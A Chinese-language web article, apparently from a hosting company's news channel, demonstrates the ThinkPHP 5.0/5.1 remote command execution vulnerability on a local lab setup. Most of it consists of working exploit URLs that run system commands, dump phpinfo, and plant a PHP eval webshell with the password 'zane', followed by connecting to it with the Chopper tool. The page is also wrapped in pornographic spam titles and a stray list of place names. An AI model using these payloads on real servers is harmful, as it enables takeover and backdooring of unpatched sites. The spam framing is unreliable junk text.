亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

thinkphp_5x_命令執行漏洞的示例分析

發布時間:2021-03-10 09:52:45 來源:億速云 閱讀:161 作者:小新 欄目:編程語言

這篇文章主要介紹thinkphp_5x_命令執行漏洞的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

thinkphp_5x_命令執行漏洞

受影響版本包括5.0和5.1版本

docker漏洞環境源碼:
https://github.com/vulnspy/thinkphp-5.1.29
本地環境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函數遠程命令執行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通過phpinfo函數寫出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

寫入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>

使用菜刀連接
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php   密碼為zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php        密碼為zane

以上是“thinkphp_5x_命令執行漏洞的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

宁陕县| 临洮县| 织金县| 大渡口区| 肃宁县| 浑源县| 曲靖市| 来凤县| 合川市| 襄垣县| 海宁市| 孙吴县| 华亭县| 溆浦县| 阿图什市| 密云县| 广平县| 电白县| 金坛市| 阿荣旗| 南靖县| 长治县| 始兴县| 安仁县| 增城市| 重庆市| 遵化市| 万州区| 辽源市| 镇坪县| 砀山县| 华宁县| 广饶县| 元朗区| 黑河市| 台州市| 鹤壁市| 襄垣县| 呼伦贝尔市| 舞阳县| 洮南市|